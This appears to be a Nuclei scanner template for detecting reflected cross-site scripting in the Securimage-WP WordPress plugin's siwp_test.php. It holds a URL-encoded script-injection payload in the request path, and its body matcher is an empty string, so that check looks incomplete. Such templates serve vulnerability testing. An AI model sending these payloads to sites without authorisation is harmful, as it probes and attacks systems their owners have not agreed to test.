id: wp-securimage-xss info: name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium reference: - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info tags: wordpress,xss,wp-plugin requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200